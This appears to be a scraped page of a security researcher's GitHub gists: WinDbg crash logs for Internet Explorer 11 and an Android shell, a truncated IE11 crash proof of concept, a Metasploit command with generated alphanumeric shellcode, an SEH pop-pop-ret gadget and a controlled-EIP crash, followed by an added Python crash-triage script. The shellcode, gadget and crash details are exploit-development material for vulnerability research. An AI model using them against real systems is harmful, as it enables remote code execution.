h0wl
@h0wl
h0wl / jsonp_crash.txt
Created June 22, 2015 18:35
IE 11 jsonp crash log
(c14.12b0): Access violation - code c0000005 (!!! second chance !!!)
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\SYSTEM32\ntdll.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\jscript9.dll -
eax=0dcede18 ebx=1762ef78 ecx=0dcede88 edx=1767cff0 esi=1759e980 edi=1759e980
eip=6a291314 esp=0b0dc5a8 ebp=0b0dc5d0 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
jscript9!DllCanUnloadNow+0xb5d24:
6a291314 8b4a04 mov ecx,dword ptr [edx+4] ds:002b:1767cff4=????????
0:006> .symfix
0:006> .reload
@h0wl
h0wl / getinputcrash.log
Created June 7, 2015 08:23
ie11 getinputcontext windbg
(4684.4fcc): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=0e2b6f84 ecx=00000000 edx=0a8e7fb8 esi=00000000 edi=0e2b6e98
eip=5f302e86 esp=0a84b074 ebp=0a84b098 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
MSHTML!Tree::ElementNode::GetCElement:
5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=????????
0:017> .symfix
0:017> .reload
Reloading current modules
................................................................
@h0wl
h0wl / ie11_getinputcontext.html
Last active August 29, 2015 14:22
Microsoft Internet Explorer 11 Crash PoC
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<script>
function boom() {
var divA = document.createElement("div");
document.body.appendChild(divA);
try {
//divA.contentEditable = "true";
Logcat output:
F/libc ( 7647): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x53a686f4 in tid 7647 (sh)
I/DEBUG ( 1468): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG ( 1468): Build fingerprint: 'google/occam/mako:5.0.1/LRX22C/1602158:user/release-keys'
I/DEBUG ( 1468): Revision: '11'
I/DEBUG ( 1468): ABI: 'arm'
I/DEBUG ( 1468): pid: 7647, tid: 7647, name: sh >>> /system/bin/sh <<<
Program received signal SIGSEGV, Segmentation fault.
0x080d827a in xputchar (c=8388738) at sh.print.c:156
156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {
(gdb) x/i $eip
=> 0x80d827a <xputchar+234>: movzwl (%eax,%ebx,2),%edx

Keybase proof

I hereby claim:

  • I am h0wl on github.
  • I am howl (https://keybase.io/howl) on keybase.
  • I have a public key whose fingerprint is 0B86 93C8 A01C 9815 1500 BEDE C8A8 39DC 71FE CD63

To claim this, I am signing this object:

root@kali:~# msfpayload windows/exec CMD=calc R | msfencode BufferRegister=ESP -e x86/alpha_upper -t raw
[*] x86/alpha_upper succeeded with size 453 (iteration=1)
TYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLZHLIS0C030CPK9ZEP1YBBDLKV26PLK62TLLKF2EDLKSB6HTOH7PJVFP1KOVQYPNLGLU13LERFL10YQXOTM318GZBJP1B1GLKF24PLK72WL5QN0LK70T8LEO0441ZUQ8PF0LK1XB8LKQHGP5Q8SM37LPILK6TLK5Q8V01KO01O0NLIQHO4MEQO77HKPBUKDS3CMZXGKSMVD45JB0XLKF81431YCU6LK4LPKLKV85LC1HSLKUTLKC18PK974147T1KQKE11I1J61KOM0V81O1JLK22JKLFQM2JC1LMLEX9UP30S060BHFQLKBOMWKOXUOKL0NUNBV63XNFLUOMMMKOIEWL5VSL5ZK0KKKP2UTEOK775C2RROCZ5P63KO9ESSE12LSSUPAA
0x64743851 : pop edi # pop ebp # ret | asciiprint,ascii,alphanum {PAGE_EXECUTE_READ} [libpng15-15.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (D:\Program Files (x86)\Hopper Disassembler\libpng15-15.dll)
Windows 7:
(1fc4.2034): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=00000000 ecx=41414141 edx=7737b4ad esi=00000000 edi=00000000
eip=41414141 esp=00091370 ebp=00091390 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
41414141 ?? ???
0:000> !exchain
00091384: ntdll!ExecuteHandler2+3a (7737b4ad)
[...]
00284ce0: ntdll!ExecuteHandler2+3a (7737b4ad)
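As an added example that is not one of h0wl's gists, the script below does a first-pass triage of the three WinDbg crash dumps on this page (the jscript9 JSONP crash, the MSHTML GetCElement crash and the Windows 7 crash above), along the lines of what the !exploitable extension reports. It parses the exception code, the register dump and the faulting instruction, then sorts each crash into a category: the jscript9 crash is a read through an unmapped pointer (edx+4 resolves to 1767cff4), the MSHTML crash is a near-null read (ecx=0, so ecx+8 is address 8), and the Windows 7 crash has eip=41414141 with ntdll!ExecuteHandler2 on the chain, which is the signature of an overwritten SEH handler being dispatched. The sample inputs are the page's own log lines, trimmed; the 64 KiB near-null threshold, the category names and the read-only mnemonic list are this script's assumptions.

```python
import re

# Constructed sample input: the register dumps and faulting-instruction lines
# copied from the three WinDbg crash logs on this page, trimmed to what the parser needs.
SAMPLE_LOGS = {
    "ie11_jsonp": (
        "(c14.12b0): Access violation - code c0000005 (!!! second chance !!!)\n"
        "eax=0dcede18 ebx=1762ef78 ecx=0dcede88 edx=1767cff0 esi=1759e980 edi=1759e980\n"
        "eip=6a291314 esp=0b0dc5a8 ebp=0b0dc5d0 iopl=0 nv up ei pl nz na pe nc\n"
        "jscript9!DllCanUnloadNow+0xb5d24:\n"
        "6a291314 8b4a04 mov ecx,dword ptr [edx+4] ds:002b:1767cff4=????????\n"
    ),
    "ie11_getinputcontext": (
        "(4684.4fcc): Access violation - code c0000005 (!!! second chance !!!)\n"
        "eax=00000000 ebx=0e2b6f84 ecx=00000000 edx=0a8e7fb8 esi=00000000 edi=0e2b6e98\n"
        "eip=5f302e86 esp=0a84b074 ebp=0a84b098 iopl=0 nv up ei pl zr na pe nc\n"
        "MSHTML!Tree::ElementNode::GetCElement:\n"
        "5f302e86 f7410800001000 test dword ptr [ecx+8],100000h ds:002b:00000008=????????\n"
    ),
    "win7_seh": (
        "(1fc4.2034): Access violation - code c0000005 (!!! second chance !!!)\n"
        "eax=00000000 ebx=00000000 ecx=41414141 edx=7737b4ad esi=00000000 edi=00000000\n"
        "eip=41414141 esp=00091370 ebp=00091390 iopl=0 nv up ei pl zr na pe nc\n"
        "41414141 ?? ???\n"
        "0:000> !exchain\n"
        "00091384: ntdll!ExecuteHandler2+3a (7737b4ad)\n"
    ),
}

EXC_RE = re.compile(r"code ([0-9a-f]{8})")
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[sb]p|eip)=([0-9a-f]{8})")
# WinDbg prints the effective address of a faulting memory operand as
# "ds:SSSS:ADDR=VALUE", with "????????" as the value when ADDR is unmapped.
FAULT_RE = re.compile(r"ds:[0-9a-f]{4}:([0-9a-f]{8})=(\?{8}|[0-9a-f]{8})")
# Disassembly line: "<addr> <bytes> <mnemonic> <operands>", or "<addr> ?? ???" when
# nothing could be disassembled at eip (the instruction fetch itself faulted).
DISASM_RE = re.compile(r"^([0-9a-f]{8}) ([0-9a-f]+|\?\?) (.*)$")

NEAR_NULL = 0x10000            # assumption: treat faults in the first 64 KiB as null-pointer derefs
READ_ONLY_MNEMONICS = {"cmp", "test", "push"}   # memory in the first operand is still only read


def is_fill_pattern(value):
    """True when a 32-bit value is four copies of one printable byte, e.g. 0x41414141."""
    b = value.to_bytes(4, "little")
    return len(set(b)) == 1 and 0x20 <= b[0] <= 0x7E


def memory_access(mnemonic, operands):
    """Classify the memory operand of an x86 instruction as 'read', 'write' or None."""
    dst, _, src = operands.partition(",")
    if "[" in dst and mnemonic not in READ_ONLY_MNEMONICS:
        return "write"
    if "[" in dst or "[" in src:
        return "read"
    return None


def classify(r):
    if r["access"] == "execute":
        return "EIP_CONTROL" if r["eip"] is not None and is_fill_pattern(r["eip"]) else "EXEC_AV"
    if r["access"] == "write":
        return "WRITE_AV"
    if r["access"] == "read":
        return "NULL_READ" if r["fault_addr"] is not None and r["fault_addr"] < NEAR_NULL else "READ_AV"
    return "UNKNOWN"


def triage(log):
    """Parse one WinDbg second-chance dump and return code, eip, fault address, access and verdict."""
    code = EXC_RE.search(log)
    regs = {name: int(val, 16) for name, val in REG_RE.findall(log)}
    r = {"code": code.group(1) if code else None, "eip": regs.get("eip"),
         "fault_addr": None, "access": None,
         # ExecuteHandler2 on the chain means the crash happened while a registered
         # SEH handler was being invoked, i.e. a likely handler-pointer overwrite.
         "seh_dispatch": "ExecuteHandler2" in log}
    disasm = None
    for line in log.splitlines():
        m = DISASM_RE.match(line)
        if m:
            disasm = m
    if disasm is not None:
        addr, insn_bytes, rest = disasm.groups()
        if insn_bytes == "??":
            r["fault_addr"], r["access"] = int(addr, 16), "execute"
        else:
            fm = FAULT_RE.search(rest)
            if fm:
                r["fault_addr"] = int(fm.group(1), 16)
            mnemonic, _, operands = rest.split(" ds:")[0].partition(" ")
            r["access"] = memory_access(mnemonic, operands)
    r["verdict"] = classify(r)
    return r


if __name__ == "__main__":
    for name, log in SAMPLE_LOGS.items():
        r = triage(log)
        print(f"{name:22} eip={r['eip']:08x} fault={r['fault_addr']:08x} "
              f"{r['access']:8} seh={r['seh_dispatch']!s:5} -> {r['verdict']}")
```

EIP_CONTROL and WRITE_AV are the verdicts worth spending time on; NULL_READ is almost always just a denial of service, and READ_AV needs a look at where the pointer came from (here edx, loaded a few instructions earlier in jscript9) before it can be called anything. The script only looks at the faulting instruction, so a read that feeds a later indirect call is still reported as READ_AV; that is the limitation !exploitable shares.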
<div onload=#>